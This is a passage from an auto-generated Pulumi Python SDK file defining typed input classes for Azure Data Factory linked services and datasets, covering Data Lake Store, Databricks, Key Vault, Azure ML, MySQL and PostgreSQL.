pulumi.set(self, "account_name", value)
@property
@pulumi.getter
def annotations(self) -> Optional[pulumi.Input[Sequence[Any]]]:
"""
List of tags that can be used for describing the linked service.
"""
return pulumi.get(self, "annotations")
@annotations.setter
def annotations(self, value: Optional[pulumi.Input[Sequence[Any]]]):
pulumi.set(self, "annotations", value)
@property
@pulumi.getter(name="connectVia")
def connect_via(self) -> Optional[pulumi.Input['IntegrationRuntimeReferenceArgs']]:
"""
The integration runtime reference.
"""
return pulumi.get(self, "connect_via")
@connect_via.setter
def connect_via(self, value: Optional[pulumi.Input['IntegrationRuntimeReferenceArgs']]):
pulumi.set(self, "connect_via", value)
@property
@pulumi.getter
def description(self) -> Optional[pulumi.Input[str]]:
"""
Linked service description.
"""
return pulumi.get(self, "description")
@description.setter
def description(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "description", value)
@property
@pulumi.getter(name="encryptedCredential")
def encrypted_credential(self) -> Optional[Any]:
"""
The encrypted credential used for authentication. Credentials are encrypted using the integration runtime credential manager. Type: string (or Expression with resultType string).
"""
return pulumi.get(self, "encrypted_credential")
@encrypted_credential.setter
def encrypted_credential(self, value: Optional[Any]):
pulumi.set(self, "encrypted_credential", value)
@property
@pulumi.getter
def parameters(self) -> Optional[pulumi.Input[Mapping[str, pulumi.Input['ParameterSpecificationArgs']]]]:
"""
Parameters for linked service.
"""
return pulumi.get(self, "parameters")
@parameters.setter
def parameters(self, value: Optional[pulumi.Input[Mapping[str, pulumi.Input['ParameterSpecificationArgs']]]]):
pulumi.set(self, "parameters", value)
@property
@pulumi.getter(name="resourceGroupName")
def resource_group_name(self) -> Optional[Any]:
"""
Data Lake Store account resource group name (if different from Data Factory account). Type: string (or Expression with resultType string).
"""
return pulumi.get(self, "resource_group_name")
@resource_group_name.setter
def resource_group_name(self, value: Optional[Any]):
pulumi.set(self, "resource_group_name", value)
@property
@pulumi.getter(name="servicePrincipalId")
def service_principal_id(self) -> Optional[Any]:
"""
The ID of the application used to authenticate against the Azure Data Lake Store account. Type: string (or Expression with resultType string).
"""
return pulumi.get(self, "service_principal_id")
@service_principal_id.setter
def service_principal_id(self, value: Optional[Any]):
pulumi.set(self, "service_principal_id", value)
@property
@pulumi.getter(name="servicePrincipalKey")
def service_principal_key(self) -> Optional[pulumi.Input[Union['AzureKeyVaultSecretReferenceArgs', 'SecureStringArgs']]]:
"""
The key of the application used to authenticate against the Azure Data Lake Store account.
"""
return pulumi.get(self, "service_principal_key")
@service_principal_key.setter
def service_principal_key(self, value: Optional[pulumi.Input[Union['AzureKeyVaultSecretReferenceArgs', 'SecureStringArgs']]]):
pulumi.set(self, "service_principal_key", value)
@property
@pulumi.getter(name="subscriptionId")
def subscription_id(self) -> Optional[Any]:
"""
Data Lake Store account subscription ID (if different from Data Factory account). Type: string (or Expression with resultType string).
"""
return pulumi.get(self, "subscription_id")
@subscription_id.setter
def subscription_id(self, value: Optional[Any]):
pulumi.set(self, "subscription_id", value)
@property
@pulumi.getter
def tenant(self) -> Optional[Any]:
"""
The name or ID of the tenant to which the service principal belongs. Type: string (or Expression with resultType string).
"""
return pulumi.get(self, "tenant")
@tenant.setter
def tenant(self, value: Optional[Any]):
pulumi.set(self, "tenant", value)
@pulumi.input_type
class AzureDatabricksLinkedServiceArgs:
def __init__(__self__, *,
access_token: pulumi.Input[Union['AzureKeyVaultSecretReferenceArgs', 'SecureStringArgs']],
domain: Any,
type: pulumi.Input[str],
annotations: Optional[pulumi.Input[Sequence[Any]]] = None,
connect_via: Optional[pulumi.Input['IntegrationRuntimeReferenceArgs']] = None,
description: Optional[pulumi.Input[str]] = None,
encrypted_credential: Optional[Any] = None,
existing_cluster_id: Optional[Any] = None,
new_cluster_node_type: Optional[Any] = None,
new_cluster_num_of_worker: Optional[Any] = None,
new_cluster_spark_conf: Optional[pulumi.Input[Mapping[str, Any]]] = None,
new_cluster_version: Optional[Any] = None,
parameters: Optional[pulumi.Input[Mapping[str, pulumi.Input['ParameterSpecificationArgs']]]] = None):
"""
Azure Databricks linked service.
:param pulumi.Input[Union['AzureKeyVaultSecretReferenceArgs', 'SecureStringArgs']] access_token: Access token for the Databricks REST API. Refer to https://docs.azuredatabricks.net/api/latest/authentication.html. Type: string (or Expression with resultType string).
:param Any domain: The domain name of your Databricks deployment, in the form <REGION>.azuredatabricks.net. Type: string (or Expression with resultType string).
:param pulumi.Input[str] type: Type of linked service.
:param pulumi.Input[Sequence[Any]] annotations: List of tags that can be used for describing the linked service.
:param pulumi.Input['IntegrationRuntimeReferenceArgs'] connect_via: The integration runtime reference.
:param pulumi.Input[str] description: Linked service description.
:param Any encrypted_credential: The encrypted credential used for authentication. Credentials are encrypted using the integration runtime credential manager. Type: string (or Expression with resultType string).
:param Any existing_cluster_id: The ID of an existing cluster to be used for all runs of this job. Type: string (or Expression with resultType string).
:param Any new_cluster_node_type: The node type of the new cluster. Type: string (or Expression with resultType string).
:param Any new_cluster_num_of_worker: Number of worker nodes that the new cluster should have, as a string-formatted Int32: for example, '1' means one fixed worker, while '1:10' means auto-scale from 1 (min) to 10 (max) workers. Type: string (or Expression with resultType string).
:param pulumi.Input[Mapping[str, Any]] new_cluster_spark_conf: A set of optional, user-specified Spark configuration key-value pairs.
:param Any new_cluster_version: The Spark version of the new cluster. Type: string (or Expression with resultType string).
:param pulumi.Input[Mapping[str, pulumi.Input['ParameterSpecificationArgs']]] parameters: Parameters for linked service.
"""
pulumi.set(__self__, "access_token", access_token)
pulumi.set(__self__, "domain", domain)
pulumi.set(__self__, "type", 'AzureDatabricks')
if annotations is not None:
pulumi.set(__self__, "annotations", annotations)
if connect_via is not None:
pulumi.set(__self__, "connect_via", connect_via)
if description is not None:
pulumi.set(__self__, "description", description)
if encrypted_credential is not None:
pulumi.set(__self__, "encrypted_credential", encrypted_credential)
if existing_cluster_id is not None:
pulumi.set(__self__, "existing_cluster_id", existing_cluster_id)
if new_cluster_node_type is not None:
pulumi.set(__self__, "new_cluster_node_type", new_cluster_node_type)
if new_cluster_num_of_worker is not None:
pulumi.set(__self__, "new_cluster_num_of_worker", new_cluster_num_of_worker)
if new_cluster_spark_conf is not None:
pulumi.set(__self__, "new_cluster_spark_conf", new_cluster_spark_conf)
if new_cluster_version is not None:
pulumi.set(__self__, "new_cluster_version", new_cluster_version)
if parameters is not None:
pulumi.set(__self__, "parameters", parameters)
@property
@pulumi.getter(name="accessToken")
def access_token(self) -> pulumi.Input[Union['AzureKeyVaultSecretReferenceArgs', 'SecureStringArgs']]:
"""
Access token for the Databricks REST API. Refer to https://docs.azuredatabricks.net/api/latest/authentication.html. Type: string (or Expression with resultType string).
"""
return pulumi.get(self, "access_token")
@access_token.setter
def access_token(self, value: pulumi.Input[Union['AzureKeyVaultSecretReferenceArgs', 'SecureStringArgs']]):
pulumi.set(self, "access_token", value)
@property
@pulumi.getter
def domain(self) -> Any:
"""
The domain name of your Databricks deployment, in the form <REGION>.azuredatabricks.net. Type: string (or Expression with resultType string).
"""
return pulumi.get(self, "domain")
@domain.setter
def domain(self, value: Any):
pulumi.set(self, "domain", value)
@property
@pulumi.getter
def type(self) -> pulumi.Input[str]:
"""
Type of linked service.
"""
return pulumi.get(self, "type")
@type.setter
def type(self, value: pulumi.Input[str]):
pulumi.set(self, "type", value)
@property
@pulumi.getter
def annotations(self) -> Optional[pulumi.Input[Sequence[Any]]]:
"""
List of tags that can be used for describing the linked service.
"""
return pulumi.get(self, "annotations")
@annotations.setter
def annotations(self, value: Optional[pulumi.Input[Sequence[Any]]]):
pulumi.set(self, "annotations", value)
@property
@pulumi.getter(name="connectVia")
def connect_via(self) -> Optional[pulumi.Input['IntegrationRuntimeReferenceArgs']]:
"""
The integration runtime reference.
"""
return pulumi.get(self, "connect_via")
@connect_via.setter
def connect_via(self, value: Optional[pulumi.Input['IntegrationRuntimeReferenceArgs']]):
pulumi.set(self, "connect_via", value)
@property
@pulumi.getter
def description(self) -> Optional[pulumi.Input[str]]:
"""
Linked service description.
"""
return pulumi.get(self, "description")
@description.setter
def description(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "description", value)
@property
@pulumi.getter(name="encryptedCredential")
def encrypted_credential(self) -> Optional[Any]:
"""
The encrypted credential used for authentication. Credentials are encrypted using the integration runtime credential manager. Type: string (or Expression with resultType string).
"""
return pulumi.get(self, "encrypted_credential")
@encrypted_credential.setter
def encrypted_credential(self, value: Optional[Any]):
pulumi.set(self, "encrypted_credential", value)
@property
@pulumi.getter(name="existingClusterId")
def existing_cluster_id(self) -> Optional[Any]:
"""
The ID of an existing cluster to be used for all runs of this job. Type: string (or Expression with resultType string).
"""
return pulumi.get(self, "existing_cluster_id")
@existing_cluster_id.setter
def existing_cluster_id(self, value: Optional[Any]):
pulumi.set(self, "existing_cluster_id", value)
@property
@pulumi.getter(name="newClusterNodeType")
def new_cluster_node_type(self) -> Optional[Any]:
"""
The node type of the new cluster. Type: string (or Expression with resultType string).
"""
return pulumi.get(self, "new_cluster_node_type")
@new_cluster_node_type.setter
def new_cluster_node_type(self, value: Optional[Any]):
pulumi.set(self, "new_cluster_node_type", value)
@property
@pulumi.getter(name="newClusterNumOfWorker")
def new_cluster_num_of_worker(self) -> Optional[Any]:
"""
Number of worker nodes that the new cluster should have, as a string-formatted Int32: for example, '1' means one fixed worker, while '1:10' means auto-scale from 1 (min) to 10 (max) workers. Type: string (or Expression with resultType string).
"""
return pulumi.get(self, "new_cluster_num_of_worker")
@new_cluster_num_of_worker.setter
def new_cluster_num_of_worker(self, value: Optional[Any]):
pulumi.set(self, "new_cluster_num_of_worker", value)
@property
@pulumi.getter(name="newClusterSparkConf")
def new_cluster_spark_conf(self) -> Optional[pulumi.Input[Mapping[str, Any]]]:
"""
A set of optional, user-specified Spark configuration key-value pairs.
"""
return pulumi.get(self, "new_cluster_spark_conf")
@new_cluster_spark_conf.setter
def new_cluster_spark_conf(self, value: Optional[pulumi.Input[Mapping[str, Any]]]):
pulumi.set(self, "new_cluster_spark_conf", value)
@property
@pulumi.getter(name="newClusterVersion")
def new_cluster_version(self) -> Optional[Any]:
"""
The Spark version of the new cluster. Type: string (or Expression with resultType string).
"""
return pulumi.get(self, "new_cluster_version")
@new_cluster_version.setter
def new_cluster_version(self, value: Optional[Any]):
pulumi.set(self, "new_cluster_version", value)
@property
@pulumi.getter
def parameters(self) -> Optional[pulumi.Input[Mapping[str, pulumi.Input['ParameterSpecificationArgs']]]]:
"""
Parameters for linked service.
"""
return pulumi.get(self, "parameters")
@parameters.setter
def parameters(self, value: Optional[pulumi.Input[Mapping[str, pulumi.Input['ParameterSpecificationArgs']]]]):
pulumi.set(self, "parameters", value)
@pulumi.input_type
class AzureKeyVaultLinkedServiceArgs:
def __init__(__self__, *,
base_url: Any,
type: pulumi.Input[str],
annotations: Optional[pulumi.Input[Sequence[Any]]] = None,
connect_via: Optional[pulumi.Input['IntegrationRuntimeReferenceArgs']] = None,
description: Optional[pulumi.Input[str]] = None,
parameters: Optional[pulumi.Input[Mapping[str, pulumi.Input['ParameterSpecificationArgs']]]] = None):
"""
Azure Key Vault linked service.
:param Any base_url: The base URL of the Azure Key Vault, e.g. https://myakv.vault.azure.net. Type: string (or Expression with resultType string).
:param pulumi.Input[str] type: Type of linked service.
:param pulumi.Input[Sequence[Any]] annotations: List of tags that can be used for describing the linked service.
:param pulumi.Input['IntegrationRuntimeReferenceArgs'] connect_via: The integration runtime reference.
:param pulumi.Input[str] description: Linked service description.
:param pulumi.Input[Mapping[str, pulumi.Input['ParameterSpecificationArgs']]] parameters: Parameters for linked service.
"""
pulumi.set(__self__, "base_url", base_url)
pulumi.set(__self__, "type", 'AzureKeyVault')
if annotations is not None:
pulumi.set(__self__, "annotations", annotations)
if connect_via is not None:
pulumi.set(__self__, "connect_via", connect_via)
if description is not None:
pulumi.set(__self__, "description", description)
if parameters is not None:
pulumi.set(__self__, "parameters", parameters)
@property
@pulumi.getter(name="baseUrl")
def base_url(self) -> Any:
"""
The base URL of the Azure Key Vault, e.g. https://myakv.vault.azure.net. Type: string (or Expression with resultType string).
"""
return pulumi.get(self, "base_url")
@base_url.setter
def base_url(self, value: Any):
pulumi.set(self, "base_url", value)
@property
@pulumi.getter
def type(self) -> pulumi.Input[str]:
"""
Type of linked service.
"""
return pulumi.get(self, "type")
@type.setter
def type(self, value: pulumi.Input[str]):
pulumi.set(self, "type", value)
@property
@pulumi.getter
def annotations(self) -> Optional[pulumi.Input[Sequence[Any]]]:
"""
List of tags that can be used for describing the linked service.
"""
return pulumi.get(self, "annotations")
@annotations.setter
def annotations(self, value: Optional[pulumi.Input[Sequence[Any]]]):
pulumi.set(self, "annotations", value)
@property
@pulumi.getter(name="connectVia")
def connect_via(self) -> Optional[pulumi.Input['IntegrationRuntimeReferenceArgs']]:
"""
The integration runtime reference.
"""
return pulumi.get(self, "connect_via")
@connect_via.setter
def connect_via(self, value: Optional[pulumi.Input['IntegrationRuntimeReferenceArgs']]):
pulumi.set(self, "connect_via", value)
@property
@pulumi.getter
def description(self) -> Optional[pulumi.Input[str]]:
"""
Linked service description.
"""
return pulumi.get(self, "description")
@description.setter
def description(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "description", value)
@property
@pulumi.getter
def parameters(self) -> Optional[pulumi.Input[Mapping[str, pulumi.Input['ParameterSpecificationArgs']]]]:
"""
Parameters for linked service.
"""
return pulumi.get(self, "parameters")
@parameters.setter
def parameters(self, value: Optional[pulumi.Input[Mapping[str, pulumi.Input['ParameterSpecificationArgs']]]]):
pulumi.set(self, "parameters", value)
@pulumi.input_type
class AzureKeyVaultSecretReferenceArgs:
def __init__(__self__, *,
secret_name: Any,
store: pulumi.Input['LinkedServiceReferenceArgs'],
type: pulumi.Input[str],
secret_version: Optional[Any] = None):
"""
Azure Key Vault secret reference.
:param Any secret_name: The name of the secret in Azure Key Vault. Type: string (or Expression with resultType string).
:param pulumi.Input['LinkedServiceReferenceArgs'] store: The Azure Key Vault linked service reference.
:param pulumi.Input[str] type: Type of the secret.
:param Any secret_version: The version of the secret in Azure Key Vault. The default value is the latest version of the secret. Type: string (or Expression with resultType string).
"""
pulumi.set(__self__, "secret_name", secret_name)
pulumi.set(__self__, "store", store)
pulumi.set(__self__, "type", 'AzureKeyVaultSecret')
if secret_version is not None:
pulumi.set(__self__, "secret_version", secret_version)
@property
@pulumi.getter(name="secretName")
def secret_name(self) -> Any:
"""
The name of the secret in Azure Key Vault. Type: string (or Expression with resultType string).
"""
return pulumi.get(self, "secret_name")
@secret_name.setter
def secret_name(self, value: Any):
pulumi.set(self, "secret_name", value)
@property
@pulumi.getter
def store(self) -> pulumi.Input['LinkedServiceReferenceArgs']:
"""
The Azure Key Vault linked service reference.
"""
return pulumi.get(self, "store")
@store.setter
def store(self, value: pulumi.Input['LinkedServiceReferenceArgs']):
pulumi.set(self, "store", value)
@property
@pulumi.getter
def type(self) -> pulumi.Input[str]:
"""
Type of the secret.
"""
return pulumi.get(self, "type")
@type.setter
def type(self, value: pulumi.Input[str]):
pulumi.set(self, "type", value)
@property
@pulumi.getter(name="secretVersion")
def secret_version(self) -> Optional[Any]:
"""
The version of the secret in Azure Key Vault. The default value is the latest version of the secret. Type: string (or Expression with resultType string).
"""
return pulumi.get(self, "secret_version")
@secret_version.setter
def secret_version(self, value: Optional[Any]):
pulumi.set(self, "secret_version", value)
@pulumi.input_type
class AzureMLLinkedServiceArgs:
def __init__(__self__, *,
api_key: pulumi.Input[Union['AzureKeyVaultSecretReferenceArgs', 'SecureStringArgs']],
ml_endpoint: Any,
type: pulumi.Input[str],
annotations: Optional[pulumi.Input[Sequence[Any]]] = None,
connect_via: Optional[pulumi.Input['IntegrationRuntimeReferenceArgs']] = None,
description: Optional[pulumi.Input[str]] = None,
encrypted_credential: Optional[Any] = None,
parameters: Optional[pulumi.Input[Mapping[str, pulumi.Input['ParameterSpecificationArgs']]]] = None,
service_principal_id: Optional[Any] = None,
service_principal_key: Optional[pulumi.Input[Union['AzureKeyVaultSecretReferenceArgs', 'SecureStringArgs']]] = None,
tenant: Optional[Any] = None,
update_resource_endpoint: Optional[Any] = None):
"""
Azure ML Web Service linked service.
:param pulumi.Input[Union['AzureKeyVaultSecretReferenceArgs', 'SecureStringArgs']] api_key: The API key for accessing the Azure ML model endpoint.
:param Any ml_endpoint: The Batch Execution REST URL for an Azure ML Web Service endpoint. Type: string (or Expression with resultType string).
:param pulumi.Input[str] type: Type of linked service.
:param pulumi.Input[Sequence[Any]] annotations: List of tags that can be used for describing the linked service.
:param pulumi.Input['IntegrationRuntimeReferenceArgs'] connect_via: The integration runtime reference.
:param pulumi.Input[str] description: Linked service description.
:param Any encrypted_credential: The encrypted credential used for authentication. Credentials are encrypted using the integration runtime credential manager. Type: string (or Expression with resultType string).
:param pulumi.Input[Mapping[str, pulumi.Input['ParameterSpecificationArgs']]] parameters: Parameters for linked service.
:param Any service_principal_id: The ID of the service principal used to authenticate against the ARM-based updateResourceEndpoint of an Azure ML web service. Type: string (or Expression with resultType string).
:param pulumi.Input[Union['AzureKeyVaultSecretReferenceArgs', 'SecureStringArgs']] service_principal_key: The key of the service principal used to authenticate against the ARM-based updateResourceEndpoint of an Azure ML web service.
:param Any tenant: The name or ID of the tenant to which the service principal belongs. Type: string (or Expression with resultType string).
:param Any update_resource_endpoint: The Update Resource REST URL for an Azure ML Web Service endpoint. Type: string (or Expression with resultType string).
"""
pulumi.set(__self__, "api_key", api_key)
pulumi.set(__self__, "ml_endpoint", ml_endpoint)
pulumi.set(__self__, "type", 'AzureML')
if annotations is not None:
pulumi.set(__self__, "annotations", annotations)
if connect_via is not None:
pulumi.set(__self__, "connect_via", connect_via)
if description is not None:
pulumi.set(__self__, "description", description)
if encrypted_credential is not None:
pulumi.set(__self__, "encrypted_credential", encrypted_credential)
if parameters is not None:
pulumi.set(__self__, "parameters", parameters)
if service_principal_id is not None:
pulumi.set(__self__, "service_principal_id", service_principal_id)
if service_principal_key is not None:
pulumi.set(__self__, "service_principal_key", service_principal_key)
if tenant is not None:
pulumi.set(__self__, "tenant", tenant)
if update_resource_endpoint is not None:
pulumi.set(__self__, "update_resource_endpoint", update_resource_endpoint)
@property
@pulumi.getter(name="apiKey")
def api_key(self) -> pulumi.Input[Union['AzureKeyVaultSecretReferenceArgs', 'SecureStringArgs']]:
"""
The API key for accessing the Azure ML model endpoint.
"""
return pulumi.get(self, "api_key")
@api_key.setter
def api_key(self, value: pulumi.Input[Union['AzureKeyVaultSecretReferenceArgs', 'SecureStringArgs']]):
pulumi.set(self, "api_key", value)
@property
@pulumi.getter(name="mlEndpoint")
def ml_endpoint(self) -> Any:
"""
The Batch Execution REST URL for an Azure ML Web Service endpoint. Type: string (or Expression with resultType string).
"""
return pulumi.get(self, "ml_endpoint")
@ml_endpoint.setter
def ml_endpoint(self, value: Any):
pulumi.set(self, "ml_endpoint", value)
@property
@pulumi.getter
def type(self) -> pulumi.Input[str]:
"""
Type of linked service.
"""
return pulumi.get(self, "type")
@type.setter
def type(self, value: pulumi.Input[str]):
pulumi.set(self, "type", value)
@property
@pulumi.getter
def annotations(self) -> Optional[pulumi.Input[Sequence[Any]]]:
"""
List of tags that can be used for describing the linked service.
"""
return pulumi.get(self, "annotations")
@annotations.setter
def annotations(self, value: Optional[pulumi.Input[Sequence[Any]]]):
pulumi.set(self, "annotations", value)
@property
@pulumi.getter(name="connectVia")
def connect_via(self) -> Optional[pulumi.Input['IntegrationRuntimeReferenceArgs']]:
"""
The integration runtime reference.
"""
return pulumi.get(self, "connect_via")
@connect_via.setter
def connect_via(self, value: Optional[pulumi.Input['IntegrationRuntimeReferenceArgs']]):
pulumi.set(self, "connect_via", value)
@property
@pulumi.getter
def description(self) -> Optional[pulumi.Input[str]]:
"""
Linked service description.
"""
return pulumi.get(self, "description")
@description.setter
def description(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "description", value)
@property
@pulumi.getter(name="encryptedCredential")
def encrypted_credential(self) -> Optional[Any]:
"""
The encrypted credential used for authentication. Credentials are encrypted using the integration runtime credential manager. Type: string (or Expression with resultType string).
"""
return pulumi.get(self, "encrypted_credential")
@encrypted_credential.setter
def encrypted_credential(self, value: Optional[Any]):
pulumi.set(self, "encrypted_credential", value)
@property
@pulumi.getter
def parameters(self) -> Optional[pulumi.Input[Mapping[str, pulumi.Input['ParameterSpecificationArgs']]]]:
"""
Parameters for linked service.
"""
return pulumi.get(self, "parameters")
@parameters.setter
def parameters(self, value: Optional[pulumi.Input[Mapping[str, pulumi.Input['ParameterSpecificationArgs']]]]):
pulumi.set(self, "parameters", value)
@property
@pulumi.getter(name="servicePrincipalId")
def service_principal_id(self) -> Optional[Any]:
"""
The ID of the service principal used to authenticate against the ARM-based updateResourceEndpoint of an Azure ML web service. Type: string (or Expression with resultType string).
"""
return pulumi.get(self, "service_principal_id")
@service_principal_id.setter
def service_principal_id(self, value: Optional[Any]):
pulumi.set(self, "service_principal_id", value)
@property
@pulumi.getter(name="servicePrincipalKey")
def service_principal_key(self) -> Optional[pulumi.Input[Union['AzureKeyVaultSecretReferenceArgs', 'SecureStringArgs']]]:
"""
The key of the service principal used to authenticate against the ARM-based updateResourceEndpoint of an Azure ML web service.
"""
return pulumi.get(self, "service_principal_key")
@service_principal_key.setter
def service_principal_key(self, value: Optional[pulumi.Input[Union['AzureKeyVaultSecretReferenceArgs', 'SecureStringArgs']]]):
pulumi.set(self, "service_principal_key", value)
@property
@pulumi.getter
def tenant(self) -> Optional[Any]:
"""
The name or ID of the tenant to which the service principal belongs. Type: string (or Expression with resultType string).
"""
return pulumi.get(self, "tenant")
@tenant.setter
def tenant(self, value: Optional[Any]):
pulumi.set(self, "tenant", value)
@property
@pulumi.getter(name="updateResourceEndpoint")
def update_resource_endpoint(self) -> Optional[Any]:
"""
The Update Resource REST URL for an Azure ML Web Service endpoint. Type: string (or Expression with resultType string).
"""
return pulumi.get(self, "update_resource_endpoint")
@update_resource_endpoint.setter
def update_resource_endpoint(self, value: Optional[Any]):
pulumi.set(self, "update_resource_endpoint", value)
@pulumi.input_type
class AzureMySqlLinkedServiceArgs:
def __init__(__self__, *,
connection_string: Any,
type: pulumi.Input[str],
annotations: Optional[pulumi.Input[Sequence[Any]]] = None,
connect_via: Optional[pulumi.Input['IntegrationRuntimeReferenceArgs']] = None,
description: Optional[pulumi.Input[str]] = None,
encrypted_credential: Optional[Any] = None,
parameters: Optional[pulumi.Input[Mapping[str, pulumi.Input['ParameterSpecificationArgs']]]] = None):
"""
Azure MySQL database linked service.
:param Any connection_string: The connection string. Type: string, SecureString or AzureKeyVaultSecretReference.
:param pulumi.Input[str] type: Type of linked service.
:param pulumi.Input[Sequence[Any]] annotations: List of tags that can be used for describing the linked service.
:param pulumi.Input['IntegrationRuntimeReferenceArgs'] connect_via: The integration runtime reference.
:param pulumi.Input[str] description: Linked service description.
:param Any encrypted_credential: The encrypted credential used for authentication. Credentials are encrypted using the integration runtime credential manager. Type: string (or Expression with resultType string).
:param pulumi.Input[Mapping[str, pulumi.Input['ParameterSpecificationArgs']]] parameters: Parameters for linked service.
"""
pulumi.set(__self__, "connection_string", connection_string)
pulumi.set(__self__, "type", 'AzureMySql')
if annotations is not None:
pulumi.set(__self__, "annotations", annotations)
if connect_via is not None:
pulumi.set(__self__, "connect_via", connect_via)
if description is not None:
pulumi.set(__self__, "description", description)
if encrypted_credential is not None:
pulumi.set(__self__, "encrypted_credential", encrypted_credential)
if parameters is not None:
pulumi.set(__self__, "parameters", parameters)
@property
@pulumi.getter(name="connectionString")
def connection_string(self) -> Any:
"""
The connection string. Type: string, SecureString or AzureKeyVaultSecretReference.
"""
return pulumi.get(self, "connection_string")
@connection_string.setter
def connection_string(self, value: Any):
pulumi.set(self, "connection_string", value)
@property
@pulumi.getter
def type(self) -> pulumi.Input[str]:
"""
Type of linked service.
"""
return pulumi.get(self, "type")
@type.setter
def type(self, value: pulumi.Input[str]):
pulumi.set(self, "type", value)
@property
@pulumi.getter
def annotations(self) -> Optional[pulumi.Input[Sequence[Any]]]:
"""
List of tags that can be used for describing the linked service.
"""
return pulumi.get(self, "annotations")
@annotations.setter
def annotations(self, value: Optional[pulumi.Input[Sequence[Any]]]):
pulumi.set(self, "annotations", value)
@property
@pulumi.getter(name="connectVia")
def connect_via(self) -> Optional[pulumi.Input['IntegrationRuntimeReferenceArgs']]:
"""
The integration runtime reference.
"""
return pulumi.get(self, "connect_via")
@connect_via.setter
def connect_via(self, value: Optional[pulumi.Input['IntegrationRuntimeReferenceArgs']]):
pulumi.set(self, "connect_via", value)
@property
@pulumi.getter
def description(self) -> Optional[pulumi.Input[str]]:
"""
Linked service description.
"""
return pulumi.get(self, "description")
@description.setter
def description(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "description", value)
@property
@pulumi.getter(name="encryptedCredential")
def encrypted_credential(self) -> Optional[Any]:
"""
The encrypted credential used for authentication. Credentials are encrypted using the integration runtime credential manager. Type: string (or Expression with resultType string).
"""
return pulumi.get(self, "encrypted_credential")
@encrypted_credential.setter
def encrypted_credential(self, value: Optional[Any]):
pulumi.set(self, "encrypted_credential", value)
@property
@pulumi.getter
def parameters(self) -> Optional[pulumi.Input[Mapping[str, pulumi.Input['ParameterSpecificationArgs']]]]:
"""
Parameters for linked service.
"""
return pulumi.get(self, "parameters")
@parameters.setter
def parameters(self, value: Optional[pulumi.Input[Mapping[str, pulumi.Input['ParameterSpecificationArgs']]]]):
pulumi.set(self, "parameters", value)
@pulumi.input_type
class AzureMySqlTableDatasetArgs:
def __init__(__self__, *,
linked_service_name: pulumi.Input['LinkedServiceReferenceArgs'],
type: pulumi.Input[str],
annotations: Optional[pulumi.Input[Sequence[Any]]] = None,
description: Optional[pulumi.Input[str]] = None,
parameters: Optional[pulumi.Input[Mapping[str, pulumi.Input['ParameterSpecificationArgs']]]] = None,
structure: Optional[Any] = None,
table_name: Optional[Any] = None):
"""
The Azure MySQL database dataset.
:param pulumi.Input['LinkedServiceReferenceArgs'] linked_service_name: Linked service reference.
:param pulumi.Input[str] type: Type of dataset.
:param pulumi.Input[Sequence[Any]] annotations: List of tags that can be used for describing the Dataset.
:param pulumi.Input[str] description: Dataset description.
:param pulumi.Input[Mapping[str, pulumi.Input['ParameterSpecificationArgs']]] parameters: Parameters for dataset.
:param Any structure: Columns that define the structure of the dataset. Type: array (or Expression with resultType array), itemType: DatasetDataElement.
:param Any table_name: The Azure MySQL database table name. Type: string (or Expression with resultType string).
"""
pulumi.set(__self__, "linked_service_name", linked_service_name)
pulumi.set(__self__, "type", 'AzureMySqlTable')
if annotations is not None:
pulumi.set(__self__, "annotations", annotations)
if description is not None:
pulumi.set(__self__, "description", description)
if parameters is not None:
pulumi.set(__self__, "parameters", parameters)
if structure is not None:
pulumi.set(__self__, "structure", structure)
if table_name is not None:
pulumi.set(__self__, "table_name", table_name)
@property
@pulumi.getter(name="linkedServiceName")
def linked_service_name(self) -> pulumi.Input['LinkedServiceReferenceArgs']:
"""
Linked service reference.
"""
return pulumi.get(self, "linked_service_name")
@linked_service_name.setter
def linked_service_name(self, value: pulumi.Input['LinkedServiceReferenceArgs']):
pulumi.set(self, "linked_service_name", value)
@property
@pulumi.getter
def type(self) -> pulumi.Input[str]:
"""
Type of dataset.
"""
return pulumi.get(self, "type")
@type.setter
def type(self, value: pulumi.Input[str]):
pulumi.set(self, "type", value)
@property
@pulumi.getter
def annotations(self) -> Optional[pulumi.Input[Sequence[Any]]]:
"""
List of tags that can be used for describing the Dataset.
"""
return pulumi.get(self, "annotations")
@annotations.setter
def annotations(self, value: Optional[pulumi.Input[Sequence[Any]]]):
pulumi.set(self, "annotations", value)
@property
@pulumi.getter
def description(self) -> Optional[pulumi.Input[str]]:
"""
Dataset description.
"""
return pulumi.get(self, "description")
@description.setter
def description(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "description", value)
@property
@pulumi.getter
def parameters(self) -> Optional[pulumi.Input[Mapping[str, pulumi.Input['ParameterSpecificationArgs']]]]:
"""
Parameters for dataset.
"""
return pulumi.get(self, "parameters")
@parameters.setter
def parameters(self, value: Optional[pulumi.Input[Mapping[str, pulumi.Input['ParameterSpecificationArgs']]]]):
pulumi.set(self, "parameters", value)
@property
@pulumi.getter
def structure(self) -> Optional[Any]:
"""
Columns that define the structure of the dataset. Type: array (or Expression with resultType array), itemType: DatasetDataElement.
"""
return pulumi.get(self, "structure")
@structure.setter
def structure(self, value: Optional[Any]):
pulumi.set(self, "structure", value)
@property
@pulumi.getter(name="tableName")
def table_name(self) -> Optional[Any]:
"""
The Azure MySQL database table name. Type: string (or Expression with resultType string).
"""
return pulumi.get(self, "table_name")
@table_name.setter
def table_name(self, value: Optional[Any]):
pulumi.set(self, "table_name", value)
@pulumi.input_type
class AzurePostgreSqlLinkedServiceArgs:
def __init__(__self__, *,
type: pulumi.Input[str],
annotations: Optional[pulumi.Input[Sequence[Any]]] = None,
connect_via: Optional[pulumi.Input['IntegrationRuntimeReferenceArgs']] = None,
connection_string: Optional[Any] = None,
description: Optional[pulumi.Input[str]] = None,
encrypted_credential: Optional[Any] = None,
parameters: Optional[pulumi.Input[Mapping[str, pulumi.Input['ParameterSpecificationArgs']]]] = None):
"""
Azure PostgreSQL linked service.
:param pulumi.Input[str] type: Type of linked service.
:param pulumi.Input[Sequence[Any]] annotations: List of tags that can be used for describing the linked service.
:param pulumi.Input['IntegrationRuntimeReferenceArgs'] connect_via: The integration runtime reference.
:param Any connection_string: An ODBC connection string. Type: string, SecureString or AzureKeyVaultSecretReference.
:param pulumi.Input[str] description: Linked service description.
:param Any encrypted_credential: The encrypted credential used for authentication. Credentials are encrypted using the integration runtime credential manager. Type: string (or Expression with resultType string).
